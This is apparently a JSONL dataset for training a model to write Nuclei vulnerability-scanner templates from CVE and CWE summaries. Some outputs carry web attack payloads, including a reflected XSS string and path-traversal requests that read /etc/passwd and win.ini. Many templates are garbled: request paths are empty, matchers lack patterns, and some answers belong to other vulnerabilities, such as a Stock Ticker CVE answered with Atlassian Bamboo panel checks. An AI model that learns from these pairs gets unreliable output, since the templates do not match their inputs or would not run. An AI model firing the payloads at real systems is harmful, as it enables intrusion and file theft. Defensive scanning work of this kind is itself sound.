\"{{BaseURL}}/wp-content/uploads/wp-file-manager-pro/fm_backup/\" \n matchers:\n - type: word\n words:\n - \"Index of\" \n - \"wp-content/uploads/wp-file-manager-pro/fm_backup\" \n - \"backup_\" \n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2020-24312"}
+{"instruction": "Generate a Nuclei template for CVE-2025-29927", "input": "Title: Vulnerability (CWE-285) in vercel next.js\nSummary: Next.js is a React framework for building full-stack web applications. Starting in version 1.11.4 and prior to versions 12.3.5, 13.5.9, 14.2.25, and 15.2.3, it is possible to bypass authorization checks within a Next.js application, if the authorization check occurs in middleware. If patching to a safe version is infeasible, it is recommend that you prevent external user requests which contain the x-middleware-subrequest header from reaching your Next.js application. This vulnerability is fixed in 12.3.5, 13.5.9, 14.2.25, and 15.2.3.\nVulnerability Type: Vulnerability (CWE-285)\nSeverity: critical\nAffected Products: vercel next.js\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-29927\n\ninfo:\n name: Next.js Middleware Bypass\n author: pdresearch,pdteam,hazedic\n severity: critical\n description: Next.js contains a critical middleware bypass vulnerability affecting versions 11.1.4 through 15.2.2.\nThe vulnerability allows attackers to bypass middleware security controls by sending a specially crafted\n'x-middleware-subrequest' header, which can lead to authorization bypass and other security control circumvention.\n tags: cve,cve2025,nextjs,middleware,auth-bypass,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: regex\n part: header\n - type: status\n status:\n - 307\n - method: GET\n path:\n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200\n - method: GET\n path:\n - \"{{BaseURL}}{{endpoints}}\" \n matchers:\n - type: dsl\n - method: GET\n path:\n - \"{{BaseURL}}{{endpoints}}\" \n matchers:\n - type: dsl", "category": "cve", "severity": "critical", "id": "CVE-2025-29927"}
+{"instruction": "Generate a Nuclei template for: Google FCM API Test", "input": "Title: Google FCM API Test\nSummary: Google FCM API Test. Tags: token-spray, google, fcm\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-googlefcm\n\ninfo:\n name: Google FCM API Test\n author: zzeitlin\n severity: info\n description: Google FCM API Test\n tags: token-spray,google,fcm,firebase,cloud,messaging\n\nhttp:\n - method: POST\n path:\n - \"https://fcm.googleapis.com/fcm/send\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "api-googlefcm"}
+{"instruction": "Generate a Nuclei template for: vBulletin - Full Path Disclosure", "input": "Title: vBulletin - Full Path Disclosure\nSummary: vBulletin - Full Path Disclosure. Tags: config, exposure, fpd\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: vbulletin-path-disclosure\n\ninfo:\n name: vBulletin - Full Path Disclosure\n author: MaStErChO\n severity: info\n description: vBulletin - Full Path Disclosure\n tags: config,exposure,fpd,vbulletin,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"vBulletin\" \n part: body\n - method: GET\n path:\n - \"{{BaseURL}}/forumdisplay.php?do[]=[test.dll]\" \n - \"{{BaseURL}}/calendar.php?do[]=[test.dll]\" \n - \"{{BaseURL}}/search.php?do[]=[test.dll]\" \n - \"{{BaseURL}}/forumrunner/include/album.php\" \n - \"{{BaseURL}}/core/vb5/route/channel.php\" \n - \"{{BaseURL}}/core/vb5/route/conversation.php\" \n - \"{{BaseURL}}/includes/api/interface/noncollapsed.php\" \n - \"{{BaseURL}}/includes/api/interface/collapsed.php\" \n - \"{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba.php\" \n - \"{{BaseURL}}/vbseo_sitemap/addons/vbseo_sm_vba_links.php\" \n matchers:\n - type: word\n words:\n - \"Warning:\" \n - \"Cannot modify header information\" \n - \"/strong> on line\" \n - \"trim() expects parameter\" \n - \"class_core.php\" \n - \"header already sent\" \n - \"Fatal error\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "vbulletin-path-disclosure"}
+{"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: dedecms-config-xss\n\ninfo:\n name: DedeCMS 5.7 - Cross-Site Scripting\n author: ritikchaddha\n severity: high\n description: DeDeCMS 5.7 contains a cross-site scripting vulnerability in the '/include/dialog/config.php' file. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site.\n tags: dedecms,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/include/dialog/config.php?adminDirHand=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"location='../../\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-79"}
+{"instruction": "Generate a Nuclei template for: New Relic License Key", "input": "Title: New Relic License Key\nSummary: New Relic License Key. Tags: newrelic, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: newrelic-license-key\n\ninfo:\n name: New Relic License Key\n author: DhiyaneshDK\n severity: info\n description: New Relic License Key\n tags: newrelic,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "newrelic-license-key"}
+{"instruction": "Generate a Nuclei template for CVE-2023-26842", "input": "Title: Cross-Site Scripting (XSS) in churchcrm churchcrm\nSummary: A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: churchcrm churchcrm\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-26842\n\ninfo:\n name: ChurchCRM 4.5.3 - Cross-Site Scripting\n author: Harsh\n severity: medium\n description: A stored Cross-site scripting (XSS) vulnerability in ChurchCRM 4.5.3 allows remote attackers to inject arbitrary web script or HTML via the OptionManager.php.\n tags: cve2023,cve,churchcrm,stored-xss,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-26842"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: sql-monitor\n\ninfo:\n name: SQL Monitor - Discovery\n author: dhiyaneshDK\n severity: info\n description: SQL Monitor was discovered.\n tags: panel,red-gate,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/Account/LogIn?returnUrl=%2F&hasAttemptedCookie=True\" \n matchers:\n - type: word\n words:\n - \"
JavaScript needs to be enabled for SQL Monitor to work properly.
\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: Sentry Access Token", "input": "Title: Sentry Access Token\nSummary: Sentry Access Token. Tags: sentry, exposure, tokens\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sentry-access-token\n\ninfo:\n name: Sentry Access Token\n author: DhiyaneshDK\n severity: info\n description: Sentry Access Token\n tags: sentry,exposure,tokens,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sentry-access-token"}
+{"instruction": "Generate a Nuclei template for CVE-2021-40972", "input": "Title: Cross-Site Scripting (XSS) in spotweb_project spotweb\nSummary: Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: spotweb_project spotweb\nIndicators: error, vulnerability detected", "output": "id: CVE-2021-40972\n\ninfo:\n name: Spotweb <= 1.5.1 - Cross Site Scripting\n author: theamanrawat\n severity: medium\n description: Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\n tags: cve,cve2021,xss,spotweb,spotweb_project,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"onclick='alert(document.domain)\" \n - \"Spotweb\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2021-40972"}
+{"instruction": "Generate a Nuclei template for CVE-2023-39650", "input": "Title: SQL Injection in themevolty theme_volty_cms_blog\nSummary: Theme Volty CMS Blog up to version v4.0.1 was discovered to contain a SQL injection vulnerability via the id parameter at /tvcmsblog/single.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: themevolty theme_volty_cms_blog\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-39650\n\ninfo:\n name: PrestaShop Theme Volty CMS Blog - SQL Injection\n author: mastercho\n severity: critical\n description: In the module 'Theme Volty CMS Blog' (tvcmsblog) up to versions 4.0.1 from Theme Volty for PrestaShop, a guest can perform SQL injection in affected versions.\n tags: time-based-sqli,cve,cve2023,prestashop,sqli,tvcmsblog,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2023-39650"}
+{"instruction": "Generate a Nuclei template for: Particle Cloud API Test", "input": "Title: Particle Cloud API Test\nSummary: Particle Cloud API Test. Tags: token-spray, particle\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: api-particle\n\ninfo:\n name: Particle Cloud API Test\n author: dwisiswant0\n severity: info\n description: Particle Cloud API Test\n tags: token-spray,particle\n\nhttp:\n - method: GET\n path:\n - \"https://api.particle.io/v1/user?access_token={{token}}\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"\"account_info\":\" \n - \"\"username\":\" \n part: body\n condition: and", "category": "generic", "severity": "info", "id": "api-particle"}
+{"instruction": "Generate a Nuclei template for CVE-2022-26148", "input": "Title: Vulnerability (CWE-312) in grafana grafana and others\nSummary: An issue was discovered in Grafana through 7.3.4, when integrated with Zabbix. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\nVulnerability Type: Vulnerability (CWE-312)\nSeverity: critical\nAffected Products: grafana grafana, redhat ceph_storage, redhat storage\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-26148\n\ninfo:\n name: Grafana & Zabbix Integration - Credentials Disclosure\n author: Geekby\n severity: critical\n description: Grafana through 7.3.4, when integrated with Zabbix, contains a credential disclosure vulnerability. The Zabbix password can be found in the api_jsonrpc.php HTML source code. When the user logs in and allows the user to register, one can right click to view the source code and use Ctrl-F to search for password in api_jsonrpc.php to discover the Zabbix account password and URL address.\n tags: cve,cve2022,grafana,zabbix,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login?redirect=%2F\" \n matchers:\n - type: word\n words:\n - \"\"zabbix\":\" \n - \"\"zbx\":\" \n - \"alexanderzobnin-zabbix-datasource\" \n part: body\n condition: or\n - type: regex\n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "critical", "id": "CVE-2022-26148"}
+{"instruction": "Generate a Nuclei template for CVE-2024-12824", "input": "Title: Vulnerability (CWE-620) in CVE-2024-12824\nSummary: The Nokri \u2013 Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.\nVulnerability Type: Vulnerability (CWE-620)\nSeverity: critical\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-12824\n\ninfo:\n name: Nokri \u2013 Job Board WordPress Theme <= 1.6.2 - Unauthenticated Arbitrary Password Change\n author: iamnoooob,rootxharsh,pdresearch\n severity: critical\n description: The Nokri \u2013 Job Board WordPress Theme theme for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.6.2. This is due to the plugin not properly checking for an empty token value prior updating their details like password. This makes it possible for unauthenticated attackers to change arbitrary user's password, including administrators, and leverage that to gain access to their account.\n tags: cve,cve2024,intrusive,nokri,unauth,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"1|Password Changed successfully.\" \n part: body\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"/wp-admin\" \n - \"wordpress_logged_in\" \n part: header\n condition: and\n - type: status\n status:\n - 302", "category": "cve", "severity": "critical", "id": "CVE-2024-12824"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: digitalrebar-login\n\ninfo:\n name: RackN Digital Rebar Login Panel - Detect\n author: c-sh0\n severity: info\n description: RackN Digital Rebar login panel was detected.\n tags: rackn,digitalrebar,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n - \"{{BaseURL}}/ui\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"Digital Rebar\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting", "input": "Title: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting\nSummary: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting. WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: wpml-xss\n\ninfo:\n name: WordPress Plugin WPML Version < 4.6.1 Cross-Site Scripting\n author: bugvsme\n severity: medium\n description: WordPress Plugin WPML Version < 4.6.1 is vulnerable to RXSS via wp_lang parameter.\n tags: xss,wp,wordpress,wpml,wp-plugin,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-login.php?wp_lang=en_US%27\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"#039;\"=\" \n - \"wpml_lang\" \n part: body\n condition: and", "category": "generic", "severity": "medium", "id": "wpml-xss"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: fuji-xerox-printer-detect\n\ninfo:\n name: Fuji Xerox Printer Panel - Detect\n author: gy741\n severity: info\n description: Fuji Xerox printer panel was detected.\n tags: iot,panel,fuji,printer,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/hdstat.htm\" \n matchers:\n - type: word\n words:\n - \"Fuji Xerox Co., Ltd\" \n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
+{"instruction": "Generate a Nuclei template for CVE-2022-45365", "input": "Title: Cross-Site Scripting (XSS) in urosevic stock_ticker\nSummary: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Aleksandar Uro\u0161evi\u0107 Stock Ticker allows Reflected XSS.This issue affects Stock Ticker: from n/a through 3.23.2.\n\n\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: high\nAffected Products: urosevic stock_ticker\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-45365\n\ninfo:\n name: Stock Ticker <= 3.23.2 - Cross-Site-Scripting\n author: theamanrawat\n severity: medium\n description: The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n tags: cve2022,cve,wordpress,wp-plugin,wpscan,wp,stock-ticker,unauth,xss,urosevic,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Stock Ticker Fatal\" \n - \"Log in as a Bamboo user\" \n - \"content=\"Bamboo\" \n - \"atlassian.bamboo.plugins\" \n - \"Atlassian Bamboo\" \n part: body\n condition: or\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "atlassian-bamboo-panel"}
+{"instruction": "Generate a Nuclei template to detect Insufficiently Protected Credentials", "input": "Title: Insufficiently Protected Credentials (CWE-522)\nSummary: The product transmits or stores authentication credentials, but it uses an insecure method that is susceptible to unauthorized interception and/or retrieval.\nVulnerability Type: Insufficiently Protected Credentials\nSeverity: medium\nIndicators: unauthorized", "output": "id: alphaweb-default-login\n\ninfo:\n name: AlphaWeb XE Default Login\n author: Lark Lab\n severity: medium\n description: An AlphaWeb XE default login was discovered.\n tags: default-login,AlphaWeb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"HW Configuration\" \n - \"SW Configuration\" \n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-522"}
+{"instruction": "Generate a Nuclei template for CVE-2024-32964", "input": "Title: Vulnerability (CWE-918) in lobehub lobe_chat\nSummary: Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\nVulnerability Type: Vulnerability (CWE-918)\nSeverity: critical\nAffected Products: lobehub lobe_chat\nIndicators: unauthorized", "output": "id: CVE-2024-32964\n\ninfo:\n name: Lobe Chat <= v0.150.5 - Server-Side Request Forgery\n author: s4e-io\n severity: critical\n description: Lobe Chat is a chatbot framework that supports speech synthesis, multimodal, and extensible Function Call plugin system. Prior to 0.150.6, lobe-chat had an unauthorized Server-Side Request Forgery vulnerability in the /api/proxy endpoint. An attacker can construct malicious requests to cause Server-Side Request Forgery without logging in, attack intranet services, and leak sensitive information.\n tags: cve,cve2024,lobechat,ssrf,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"
Interactsh Server
\" \n part: response", "category": "cve", "severity": "critical", "id": "CVE-2024-32964"}
+{"instruction": "Generate a Nuclei template for CVE-2025-34031", "input": "Title: Vulnerability (CWE-20) in geoffrowland jmol\nSummary: A path traversal vulnerability exists in the Moodle LMS Jmol plugin version 6.1 and prior via the query parameter in jsmol.php. The script directly passes user input to the file_get_contents() function without proper validation, allowing attackers to read arbitrary files from the server's filesystem by crafting a malicious query value. This vulnerability can be exploited without authentication and may expose sensitive configuration data, including database credentials.\nVulnerability Type: Vulnerability (CWE-20)\nSeverity: high\nAffected Products: geoffrowland jmol\nIndicators: error, vulnerability detected", "output": "id: CVE-2025-34031\n\ninfo:\n name: Moodle Jmol Filter 6.1 - Local File Inclusion\n author: madrobot\n severity: high\n description: Moodle Jmol Filter 6.1 is vulnerable to local file inclusion through the jsmol.php file, allowing attackers to read arbitrary files on the server.\n tags: cve,cve2025,moodle,lfi,edb,jsmol,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"text/plain\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2025-34031"}
+{"instruction": "Generate a Nuclei template for CVE-2019-14251", "input": "Title: Path Traversal in temenos t24\nSummary: An issue was discovered in T24 in TEMENOS Channels R15.01. The login page presents JavaScript functions to access a document on the server once successfully authenticated. However, an attacker can leverage downloadDocServer() to traverse the file system and access files or directories that are outside of the restricted directory because WealthT24/GetImage is used with the docDownloadPath and uploadLocation parameters.\nVulnerability Type: Path Traversal\nSeverity: high\nAffected Products: temenos t24\nIndicators: error, vulnerability detected", "output": "id: CVE-2019-14251\n\ninfo:\n name: T24 Web Server - Local File Inclusion\n author: 0x_Akoko\n severity: high\n description: T24 web server is vulnerable to unauthenticated local file inclusion that permits an attacker to exfiltrate data directly from server.\n tags: cve,cve2019,temenos,lfi,unauth,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/WealthT24/GetImage?docDownloadPath=/etc/passwd\" \n - \"{{BaseURL}}/WealthT24/GetImage?docDownloadPath=c:/windows/win.ini\" \n matchers:\n - type: regex\n condition: or\n - type: status\n status:\n - 200", "category": "cve", "severity": "high", "id": "CVE-2019-14251"}
+{"instruction": "Generate a Nuclei template for: Subrion CMS Web Installer - Exposure", "input": "Title: Subrion CMS Web Installer - Exposure\nSummary: Subrion CMS Web Installer - Exposure. Subrion CMS Web Installer has been exposed.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: subrion-installer\n\ninfo:\n name: Subrion CMS Web Installer - Exposure\n author: ritikchaddha\n severity: high\n description: Subrion CMS Web Installer has been exposed.\n tags: subrion,cms,install,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/install/\" \n matchers:\n - type: word\n words:\n - \"Subrion CMS Web Installer\" \n - \"Installation wizard\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "subrion-installer"}
+{"instruction": "Generate a Nuclei template for: Synology RackStation Login Detect", "input": "Title: Synology RackStation Login Detect\nSummary: Synology RackStation Login Detect. Tags: login, tech, synology\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: synology-rackstation-login\n\ninfo:\n name: Synology RackStation Login Detect\n author: princechaddha\n severity: info\n description: Synology RackStation Login Detect\n tags: login,tech,synology,rackstation,panel,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Synology RackStation\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "synology-rackstation-login"}
+{"instruction": "Generate a Nuclei template for: SAUTER moduWeb Vision Panel - Detect", "input": "Title: SAUTER moduWeb Vision Panel - Detect\nSummary: SAUTER moduWeb Vision Panel - Detect. Sauter moduWeb Vision was detected.\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sauter-moduwebvision-panel\n\ninfo:\n name: SAUTER moduWeb Vision Panel - Detect\n author: righettod\n severity: info\n description: Sauter moduWeb Vision was detected.\n tags: panel,moduweb,sauter,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"SAUTER moduWeb Vision\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sauter-moduwebvision-panel"}
+{"instruction": "Generate a Nuclei template for: Backup Directory Listing - Detect", "input": "Title: Backup Directory Listing - Detect\nSummary: Backup Directory Listing - Detect. Backup Directory Listing folder was detected.\n\nVulnerability Type: Security Check\nSeverity: low\nIndicators: vulnerability detected", "output": "id: backup-directory-listing\n\ninfo:\n name: Backup Directory Listing - Detect\n author: DhiyaneshDK\n severity: low\n description: Backup Directory Listing folder was detected.\n tags: hackerone,backups,exposure,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/backup/\" \n - \"{{BaseURL}}/php/backup/\" \n matchers:\n - type: regex\n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "low", "id": "backup-directory-listing"}
+{"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: bitbucket-oauth-exposure\n\ninfo:\n name: Bitbucket OAuth Credentials Exposure\n author: TheZakMan\n severity: high\n description: Detects exposed auth.json files containing Bitbucket OAuth credentials\n tags: exposure,bitbucket,oauth,credentials,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/auth.json\" \n - \"{{BaseURL}}/.auth.json\" \n - \"{{BaseURL}}/config/auth.json\" \n - \"{{BaseURL}}/configs/auth.json\" \n - \"{{BaseURL}}/configuration/auth.json\" \n - \"{{BaseURL}}/api/auth.json\" \n - \"{{BaseURL}}/app/auth.json\" \n - \"{{BaseURL}}/assets/auth.json\" \n - \"{{BaseURL}}/data/auth.json\" \n - \"{{BaseURL}}/files/auth.json\" \n - \"{{BaseURL}}/public/auth.json\" \n - \"{{BaseURL}}/static/auth.json\" \n - \"{{BaseURL}}/uploads/auth.json\" \n - \"{{BaseURL}}/backup/auth.json\" \n - \"{{BaseURL}}/backups/auth.json\" \n - \"{{BaseURL}}/tmp/auth.json\" \n - \"{{BaseURL}}/temp/auth.json\" \n - \"{{BaseURL}}/cache/auth.json\" \n - \"{{BaseURL}}/logs/auth.json\" \n - \"{{BaseURL}}/admin/auth.json\" \n - \"{{BaseURL}}/administrator/auth.json\" \n - \"{{BaseURL}}/src/auth.json\" \n - \"{{BaseURL}}/source/auth.json\" \n - \"{{BaseURL}}/www/auth.json\" \n - \"{{BaseURL}}/web/auth.json\" \n - \"{{BaseURL}}/site/auth.json\" \n - \"{{BaseURL}}/sites/auth.json\" \n - \"{{BaseURL}}/private/auth.json\" \n - \"{{BaseURL}}/secure/auth.json\" \n - \"{{BaseURL}}/secret/auth.json\" \n - \"{{BaseURL}}/secrets/auth.json\" \n - \"{{BaseURL}}/env/auth.json\" \n - \"{{BaseURL}}/environment/auth.json\" \n - \"{{BaseURL}}/test/auth.json\" \n - \"{{BaseURL}}/tests/auth.json\" \n - \"{{BaseURL}}/dev/auth.json\" \n - \"{{BaseURL}}/development/auth.json\" \n - \"{{BaseURL}}/staging/auth.json\" \n - \"{{BaseURL}}/prod/auth.json\" \n - \"{{BaseURL}}/production/auth.json\" \n - \"{{BaseURL}}/includes/auth.json\" \n - \"{{BaseURL}}/include/auth.json\" \n - \"{{BaseURL}}/lib/auth.json\" \n - \"{{BaseURL}}/libs/auth.json\" \n - \"{{BaseURL}}/library/auth.json\" \n - \"{{BaseURL}}/vendor/auth.json\" \n - \"{{BaseURL}}/vendors/auth.json\" \n - \"{{BaseURL}}/node_modules/auth.json\" \n - \"{{BaseURL}}/storage/auth.json\" \n - \"{{BaseURL}}/database/auth.json\" \n - \"{{BaseURL}}/db/auth.json\" \n - \"{{BaseURL}}/auth/auth.json\" \n - \"{{BaseURL}}/authentication/auth.json\" \n - \"{{BaseURL}}/oauth/auth.json\" \n - \"{{BaseURL}}/keys/auth.json\" \n - \"{{BaseURL}}/credentials/auth.json\" \n - \"{{BaseURL}}/creds/auth.json\" \n matchers:\n - type: word\n words:\n - \"bitbucket-oauth\" \n - \"bitbucket\" \n condition: or\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"}
